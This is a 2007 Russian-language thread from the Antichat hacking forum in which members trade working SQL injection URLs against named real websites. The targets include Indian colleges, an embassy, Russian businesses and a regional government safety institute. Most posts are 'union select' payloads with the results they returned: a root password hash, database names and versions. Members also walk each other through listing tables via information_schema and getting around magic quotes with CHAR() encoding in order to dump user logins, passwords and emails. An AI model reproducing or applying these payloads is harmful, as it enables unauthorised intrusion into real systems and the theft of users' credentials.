Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.06.2007, 21:31
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от RaDDeaD
Чем паролики зашифрованы ? MD4 (base64) ??
Да, это base64.
Сообщение от RaDDeaD
и ещё
http://mbclan.org/index.php?page=comments&id=-1+union+select+1,2,3,database(),5/*
Можешь подампить базу тут:
_http://mbclan.org/forum/install/upgrade_301.php?step=hello
Последний раз редактировалось ice1k; 01.06.2007 в 21:40..
|
|
|
02.06.2007, 00:25
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://www.houseofbamboo.in/category.php?catid=-81+union+select+1,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE()),3,4,5,6,7/*
Гы, чёто больше ничего сделать не могу =\
|
|
|
|
02.06.2007, 00:31
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://www.maty.co.in/products.php?catid=-1+union+select+1,2,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),4,5,6,7/*
Не везёт мне.. Больше ничего сделать не могу.
http://www.bluepages.co.in/subcategory.php?catid=-63+union+select+1,2,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE())/*
Та же песня.
http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=-212+union+select+1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,concat(user,0x3a,password),6,7, 8,9,10,11,12+from+mysql.user/*
root:45ddce093e0d5d85
Вот терь гуд 
http://cmcludhiana.in/news_flash.php?newsid=-16+union+select+1,2,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),4,5,6/*
Вот..
http://www.mannadey.in/view_news.php?newsid=-53+union+select+1,USER(),3,4,VERSION(),DATABASE(), 7,8,9/*
Вот эта скуля меня радует
http://www.bishopmoorecollege.in/php/newsEvents.php?NewsID=-57+union+select+concat(USER(),0x3a,VERSION(),0x3a, DATABASE())/*
Хаха ))
http://polandembassy.in/NewsDetail.php?news_id=-169+union+select+1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*
http://www.lake-house.in/news/View.php?news_id=-16+union+select+1,concat(USER(),0x3a,VERSION(),0x3 a,DATABASE()),3,4,5,6/*
Для тех кто знает китайский =\
Последний раз редактировалось NOmeR1; 02.06.2007 в 01:20..
|
|
|
|
02.06.2007, 03:49
|
|
Новичок
Регистрация: 27.05.2006
Сообщений: 3
Провел на форуме:
21798
Репутация:
15
|
|
_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*
|
|
|
|
02.06.2007, 09:55
|
|
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714
Репутация:
40
|
|
Сообщение от fjuDao
_http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*
чуть не правельно постоил....попробуй так)))
http://www.koss.ru/press.php?id=666+union+select+1,concat(USER(),0x3a ,VERSION(),0x%203a,DATABASE()),3,4,5,6,7,8,9,10,11 ,12/*
вот тогда как красиво получиться))))
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/koss-www/classes/article_out.php on line 47
Edited by ice1k:
Склеил твои посты. Впредь не пиши по несколько постов подряд - редактируй пост и добавляй.
Последний раз редактировалось ice1k; 02.06.2007 в 11:35..
|
|
|
|
02.06.2007, 14:19
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 Neorin
Непонял малость...
У fjuDao правильно (в отличии от тебя) запрос построен.
И в свете недавней темы:
Код:
http://contaximages.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
Код:
http://www.harphampix.com/v2/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
|
|
|
|
02.06.2007, 15:03
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан
Код:
http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*
USER: risla@localhost
DATABASE: risla
VERSION: 4.0.18-nt
Компания Стокмэн
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version(),6,7/*
USER: kalitka@localhost
DATABASE: kalitka-plitka
VERSION: 5.0.32-Debian_7etch1-log
Последний раз редактировалось Пчел; 02.06.2007 в 16:04..
|
|
|
|
02.06.2007, 16:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Пчел
Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан
Код:
http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*
USER: risla@localhost
DATABASE: risla
VERSION: 4.0.18-nt
Компания Стокмэн
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version(),6,7/*
USER: kalitka@localhost
DATABASE: kalitka-plitka
VERSION: 5.0.32-Debian_7etch1-log
Уря наконец, попался 5 мускул )) можно поупражняться в использовании information_schema )
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,Table_name,database(),4,version(),6,7+from+information_schema.tables+limit+35,1/*
Получили таблицу ms_user
Попытался терь получить имена столбцов
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,version(),6,7+from+information_schema.columns+where+table_name='ms_user'+limit+0,1/*
но что-то незаладилось, может чтото делаю неправильно ?
Последний раз редактировалось blackybr; 02.06.2007 в 16:42..
Причина: Экранируется кавычка... magic quotes = on. поэтому не можешь ее юзать, попробуй обойти =\
|
|
|
|
02.06.2007, 16:29
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
Сообщение от geezer.code
Попытался терь получить имена столбцов
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,version(),6,7+from+information_schema.columns+where+table_name='ms_user'+limit+0,1/*
но что-то незаладилось, может чтото делаю неправильно ? Да, что-то у меня тоже не получается вывести имена стобцов 
|
|
|
|
02.06.2007, 16:39
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 Пчел
Если не знаешь, что сказать, то лучше промолчать.
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=CHAR(109,115,95,117,115,101,114)+limit+0,1/*
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(user_login,char(58),user_passwd,char(58),user_email),3,4,5,6,7+from+ms_user/*
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(login,char(58),name,char(58),password),3,4,5,6,7+from+ms_access_users/*
Последний раз редактировалось kamaz; 02.06.2007 в 16:51..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
